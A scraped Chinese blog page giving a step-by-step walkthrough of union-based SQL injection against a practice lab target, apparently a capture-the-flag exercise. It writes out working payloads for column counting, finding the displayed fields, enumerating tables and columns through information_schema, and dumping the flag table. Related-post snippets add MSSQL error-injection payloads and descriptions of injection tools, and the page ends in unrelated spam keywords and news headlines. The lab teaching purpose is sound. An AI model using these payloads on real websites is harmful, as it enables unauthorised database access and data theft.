显错注入(一)

131 篇文章 14 订阅
订阅专栏

显错注入(一)
注入环境: http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1
SQL注入原理解析以及举例1
  sql注入是指web应用程序对用户输入数据的合法性没有判断,
导致攻击者可以构造不同的sql语句来实现对数据库的操作。
  sql注入漏洞产生满足条件:
    1;用户能够控制数据的输入。
    2;原本需要执行的代码,拼接了用户的输入。
 举例:
  注意:下面测试环境使用封神台免费靶场。可以从下面链接进入:https://hack.zkaq.org/?a=battle。
  攻击流程:
    1;判断是否存在sql注入漏洞。
    2;判断网页存在字段数。
    3;判断回显点。
    4;获取信息。
  测试开始:
    测试目标获取管理员账号密码
    一;判断是否存在sql注入漏洞。
没注入前
在这里插入图片描述
一,判断是否存在sql注入漏洞
1 and 1=2
在传参(?id=1) 后面添加 and 1=2,查看页面
?id=1 and 1=2 查看页面是否正常。结果页面显示不正常。
##########################################################################
注释:因为id=1为真(可正常访问页面),且1=2为假,所以and条件永远不会成立。
对于web应用不会返回结果给用户。则攻击者能看到的是一个错误的界面或者页面结果为空。
当然,如果攻击者构造的请求异常,也会导致页面访问不正常。
在这里插入图片描述
1.2 1=1
确定是否存在语句逻辑错误导致页面不正常。?id=1 and 1=1 结果返回正常,初步判断存在sql漏洞
 注释:1=1 为真,and条件语句成立。

在这里插入图片描述
2.1;
构建sql语句:?id=1 and 1=1 order by 1
判断网页是否正常
这里我们尝试到?id=1 and 1=1 order by 4报错

在这里插入图片描述
可以判断到字段数为3(?id=1 and 1=1 order by 3)
在这里插入图片描述
三;判断回显点
构建sql语句:?id=1 and 1=2 union select 1,2,3 (之后查询结果显示在下图红框位置)
在这里插入图片描述
四;获取信息
4.1;查看当前数据库库名以及数据库版本
构建sql语句:?id=1 and 1=2 union select 1,database(),version()
############################################################################
注释:union select 1 ,database(),其中数字1占一列,凑数,用来满足union定义。database():表示网站使用的数据库,version():表示当前mysql的版本,usr():当前mysql的用户。
在这里插入图片描述
4.2;查询当前数据库以及表名称
构建sql语句:?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1
#################################################################################
 注释:information_schema数据库用于存储数据库元数据,例如:数据库名,表名,列的数据类型,访问权限等(这里我们使用的时候就打 information_schema.tables)。tables用来存储数据库中的表的信息,包括表属于哪个数据库,表的类型,存储引擎,创建时间等。table_schema和table_schema是表tables中的数据库库名和表名。limit 0,1 表示第一行显示一行数据。limit 1,1表示第二行显示一行数据。
在这里插入图片描述
这里是user哦
在这里插入图片描述
4.2;查询当前数据库以及表名称(方法二)
?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
########################################################################
注释:group_concat()函数是把选中列名,在一行输出,如下图

在这里插入图片描述
在这里插入图片描述
4.3;查询表error_flag中的字段名,查询到2个字段 flag Id
构建SQL语句: ?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘error_flag’ limit 0,1
构建SQL语句: ?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘error_flag’ limit 1,1
在这里插入图片描述
这是Id哦
在这里插入图片描述
4.3;查询表error_flag中的字段名,查询到2个字段 flag Id(方法二)
我们还是用group_concat()函数在一行输出

?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘error_flag’
在这里插入图片描述
4.4;查询字段值
既然我们明确了表和字段,那么现在就来查询值就奥利给了
这里我
?id=1 and 1=2 union select 1,2,flag from error_flag
在这里插入图片描述

?id=1 and 1=2 union select 1,2,flag from error_flag limit 0,1
?id=1 and 1=2 union select 1,2,flag from error_flag limit 1,1
?id=1 and 1=2 union select 1,2,flag from error_flag limit 2,1
?id=1 and 1=2 union select 1,2,flag from error_flag limit 3,1
这里只是指定的位置变了,自己改下limit函数的数值就可以了,这里就不多展示了,
到这里我们的flag就拿到了,不过还有方法二
在这里插入图片描述
4.4;查询字段值(方法二)
既然我们明确了表和字段,那么现在就来查询值就奥利给了
?id=1 and 1=2 union select 1,2,group_concat(Id,flag) from error_flag
在这里插入图片描述

(一)注入
qq_16864631的博客
09-29 518
1-SQL注入-注入Rank 1 Tips: 通过注入找到数据库中的Flag吧 Flag格式zKaQ-XXXXXXXX **大概思路: 1、先验证是否可以执行SQL语句来判断是否存在SQL漏洞, 2、通过order by查询到存在多少个字段。 3、通过联合查询来获得回字段。 4、获取数据库名称以及链接用户名。 5、列出数据库中所有的表. 6、列出目标表中所有的字段 7、列出目标字段中的信息 1、先验证是否可以执行SQL语句来判断是否存在SQL漏洞 地址栏可以看到id=1,那么我放入id=5-4,页面
MYSQL注入-注入
晨辰.的博客
05-02 1069
MYSQL数据库注入
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
mysql报注入_SQL注入之mysql注入
weixin_42522964的博客
01-13 249
在我们实际***中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报来进行注入,另外如何使用手工进行全程注入的利用过程,如果你知道sqlmap里面有对应的脚本的话,烦请告知一下...
SQL注入--注入(zkaq)
weixin_74410605的博客
07-11 675
sql注入是一种数据库攻击攻击手段,就是用户在表单填写sql语句来使数据库执行该语句,在管理员不知情的情况下任意查询数据库中的信息,从而获得自身需要的信息,所以sql注入攻击的本质就是将用户输入的数据当作代码执行。
SQL注入注入
qq_45691294的博客
07-15 713
注入原理 接下来我们学习注入注入也是注入的一种常用手段,通过页面返回的报信息得到我们所查询的内容。 按我个人的理解来看,注入是利用了一些特殊的函数引发报,而报会照常输出恶意查询语句的内容,这样我们就可以完成注入攻击,达到注入的目的。 注入利用的条件 注入,顾名思义就是误内容,然后通过误内容得到数据。那么既然我们要需要从误内容中得到数据,那么自然需要前端页面误内容。所以主要满足的条件有: 存在SQL注入漏洞 前端页面返回误内容 如果满足了这两个条件的话,就
oracle——注入和报注入
qq_45300786的博客
08-14 822
http://59.63.200.79:8808/index_x.php 这个网址提供了,Oracle的数据库接口,我们就可以直接用这个,而不用自己搭建了。 dual这个是一个虚表,是不存在的,是为了专门满足格式而存在的一个表。 因为你Oracle不像mysql一样,后面不加表也行,他是必须加个表名满足格式,但是为了方便就提供了dual这个表。 Oracle弱化了库的概念,强化了用户的概念。就是说把库换成了用户来查询数据。 oracle里面有多个条数据,他就排序多少个rownum,有点像mysql里的i
GET注入--注入
jeammy06061026的博客
05-16 2072
GET-基于误-字符型-单引号 MySQL语法问题 –后面"+"的作用? 2、单引号和双引号 双引号会把后面注释的“–”示出来,暂时没发现其他区别
一次简单的纯手工注入
qq_42097777的博客
03-29 587
# 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询 **注:这里还要利用到了一个函数group_concat( ),意思是将查询的结果并排 拼接一起展示,不然输出点只能示一个表名或者字段 1.利用and1=1 示正常, and 1=2 误页面。证明有注入点 2。order by 语句查询有几个字段,为了后面使用联合查询 例如,order by 4 出,...
蚂蚁注入工具1.0.0.19
07-13
对一些特定数据库的检测采用多种方式,有"模式"、"非模式",还有高级功能。软件集"注入点扫描"、"管理入口检测"、"跨站脚本攻击"、"cookie注入检测"于一身的综合注入工具! 是一款不注入工具。
啊D注入工具 2.32 纯净版
04-09
对"MSSQL模式"、"MSSQL不模式"、"Access"等数据库都有很好注入检测能力,内集"跨库查询"、"注入点扫描"、"管理入口检测"、"目录查看"、"CMD命令"、"木马上传"、"注册表读取"、"旁注/上传"、"WebShell管理"于...
一卡通软件
03-11
设置时,例如现有一台无线收发器和一台无线一卡通终端设备,从收发器到一卡通终端设备必须经过一个编号为1的无线中继器,那么路由信息数字第一组的00改为01;从收发器到一卡通终端设备必须先经过一个编号为1的无线...
啊D注入工具 V2.32 酷版
12-09
对"MSSQL模式"、"MSSQL不模式"、"Access"等数据库都有很好注入检测能力,内集"跨库查询"、"注入点扫描"、"管理入口检测"、"目录查看"、"CMD命令"、"木马上传"、"注册表读取"、"旁注/上传"、"WebShell管理"、...
Sql Server 手工注入总结(模式)
桦少's blog
01-31 936
--模式总结,利用类型转换报。 --1=convert(int,(@@version)) --1=convert(int,(select host_name())) --and 1=convert(int,(user)) --爆表名记录条数。replace(字段名,' ','') select replace(str(count(*))+'N',' ','') from sys
注入(二)
qq_45300786的博客
06-30 684
注入(二) 注入环境: http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1 SQL注入原理解析以及举例1   sql注入是指web应用程序对用户输入数据的合法性没有判断, 导致攻击者可以构造不同的sql语句来实现对数据库的操作。   sql注入漏洞产生满足条件:     1;用户能够控制数据的输入。     2;原本需要执行的代码,拼接了用户的输入。  举例:   注意:下面测试环境使用封神台免费靶场。可以从下面链接进入:https://hack.
SQL注入注入(二)
kamen2的博客
09-23 100
SQL注入注入(二)
注入(一)&(二)
weixin_52351575的博客
08-16 828
注入(一)&(二)
mysql误回注入_SQL注入注入
weixin_35308770的博客
01-28 730
注入本质?1、 SQL注入是最常见的注入。2、 注入攻击的本质,是把用户输入的数据当做SQL语句执行。3、 这里有两个关键条件:第一个是用户能够控制输入。第二个是原本程序要执行的代码,拼接了用户输入的数据,然后进行执行。渗透测试常用函数。1、GROUP_CONCAT(col):返回由属于一组的列值连接组合而成的结果。例如:id=9.9 union select 1,GROUP_CONCAT(...
160套-2G-Web网站项目-HTML5源码合集-涵盖多行业网站(商业&科技&培训&商城&课设&毕设&网页简历等模板).7z
最新发布
06-11
HTML网站模板凭借其高度的灵活性和易用性,成为前端开发者的得力助手。这些模板通常预先设计好了页面的布局和样式,开发者可以直接在此基础上进行内容的填充和功能的开发,大大节省了从0到1的时间成本。同时,优质的HTML模板会经过多次的兼容性测试,确保在不同浏览器和设备上都能呈现出良好的视觉效果,提升了用户体验。你是否正在为网站项目寻找灵感与起点?现在,我们为你精心准备了160套、总容量高达2G的Web网站项目HTML5源码合集!无论你是需要搭建商业、科技、培训、商城类网站,还是用于课程设计、毕业设计、网页简历等,这里都能找到心仪的模板。每一套模板都经过精心设计和优化,让你轻松打造专业、美观的网站。快来查看这份宝藏资源,让你的项目事半功倍吧!
为什么说get方式注入注入注入课程的初级
05-30
GET方式注入注入注入攻击中的一种较为基础的攻击方式。它是通过在URL参数中注入恶意代码,来获取或篡改网站的数据。由于GET方式提交的数据是明文的,所以攻击者可以直接在URL参数中进行注入攻击。 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
写文章

热门文章

  • 6种方法给Vmware虚拟机清理瘦身 35696
  • burpsuite安装与卸载CA证书,超详细(推荐) 21208
  • NAT模式详解(进阶篇) 20532
  • nmap快速扫描大量主机端口方法 17578
  • Xray常用使用命令 17206

分类专栏

  • 笔记 131篇
  • 学习 62篇
  • vulnstack 6篇
  • 工作要求
  • vulhub 57篇
  • Cobaltstrike系列 1篇
  • tools 1篇
  • 未授权漏洞合集 7篇
  • XSS 8篇
  • webvul 1篇
  • vulnhub 16篇
  • ElasticSearch 1篇
  • SSL 1篇
  • 网络 1篇
  • 提权 1篇
  • 文件包含 2篇
  • 代码执行 2篇
  • 内网渗透 1篇
  • 数据库 1篇
  • 数据库命令备份 1篇
  • 数据库下载导入
  • CMS 8篇
  • SRC工具 13篇
  • 复现 1篇
  • docker 1篇
  • 小迪 24篇
  • 应急响应 13篇
  • hash传递 1篇

最新评论

  • 全网最详细虚拟机网络之桥接模式(小白也能看)

    樱浅沐冰: 大佬说的是表情包

  • 全网最详细虚拟机网络之桥接模式(小白也能看)

    2401_84247058: 桥接模式没这么麻烦

  • hadoop archive详解

    weixin_42783087: 哪里透明了,客户端要用不还是要解除归档,那你归档了有什么用呢?

  • burpsuite安装与卸载CA证书,超详细(推荐)

    程序员茄子: 从生成到卸载一气呵成,多谢多谢

  • 【vulhub】 Spring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现

    Pecksniff♞: 爆赞!表情包

大家在看

  • CR 951 (Div. 2)
  • 数据合规怎么做?哪些机构可以做数据合规 817
  • [GDOI2014] 世界杯&[AHOI2001] 彩票摇奖&[NOIP2009 普及组] 分数线划定
  • 轻松构建聊天机器人,大模型 RAG 有了更强大的AI检索器 917
  • 一文搞定Java修饰词final,abstract和static 1

最新文章

  • 小白第一个Servlet程序八大对象(简单认识)
  • 小白第一个Servlet程序el表达式和jsp(简单演示)
  • 小白第一个Servlet程序扩充(详细教程!)
2023年5篇
2022年12篇
2021年188篇
2020年158篇
2019年5篇

目录

目录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

PHP网站源码黄南SEO按天收费多少钱中卫百度网站优化推荐枣庄网站搭建哪家好丹东SEO按天收费公司中山推广网站公司林芝网站建设设计公司绍兴网站推广系统潍坊网站排名优化多少钱平湖网站开发多少钱无锡seo推荐宿州网站建设设计报价宁波企业网站建设推荐塘坑模板推广哪家好永州网站建设设计推荐柳州百度网站优化排名哪家好常州阿里店铺运营价格资阳高端网站设计报价开封网站优化按天扣费公司坑梓关键词按天收费价格威海推广网站临沧模板网站建设推荐营口网站推广系统价格泰州SEO按天计费报价景德镇外贸网站制作公司济源关键词按天扣费多少钱乐山关键词按天收费价格那曲SEO按天收费盐田模板制作黔东南网站建设设计公司枣庄关键词排名包年推广公司歼20紧急升空逼退外机英媒称团队夜以继日筹划王妃复出草木蔓发 春山在望成都发生巨响 当地回应60岁老人炒菠菜未焯水致肾病恶化男子涉嫌走私被判11年却一天牢没坐劳斯莱斯右转逼停直行车网传落水者说“没让你救”系谣言广东通报13岁男孩性侵女童不予立案贵州小伙回应在美国卖三蹦子火了淀粉肠小王子日销售额涨超10倍有个姐真把千机伞做出来了近3万元金手镯仅含足金十克呼北高速交通事故已致14人死亡杨洋拄拐现身医院国产伟哥去年销售近13亿男子给前妻转账 现任妻子起诉要回新基金只募集到26元还是员工自购男孩疑遭霸凌 家长讨说法被踢出群充个话费竟沦为间接洗钱工具新的一天从800个哈欠开始单亲妈妈陷入热恋 14岁儿子报警#春分立蛋大挑战#中国投资客涌入日本东京买房两大学生合买彩票中奖一人不认账新加坡主帅:唯一目标击败中国队月嫂回应掌掴婴儿是在赶虫子19岁小伙救下5人后溺亡 多方发声清明节放假3天调休1天张家界的山上“长”满了韩国人?开封王婆为何火了主播靠辱骂母亲走红被批捕封号代拍被何赛飞拿着魔杖追着打阿根廷将发行1万与2万面值的纸币库克现身上海为江西彩礼“减负”的“试婚人”因自嘲式简历走红的教授更新简介殡仪馆花卉高于市场价3倍还重复用网友称在豆瓣酱里吃出老鼠头315晚会后胖东来又人满为患了网友建议重庆地铁不准乘客携带菜筐特朗普谈“凯特王妃P图照”罗斯否认插足凯特王妃婚姻青海通报栏杆断裂小学生跌落住进ICU恒大被罚41.75亿到底怎么缴湖南一县政协主席疑涉刑案被控制茶百道就改标签日期致歉王树国3次鞠躬告别西交大师生张立群任西安交通大学校长杨倩无缘巴黎奥运

PHP网站源码 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化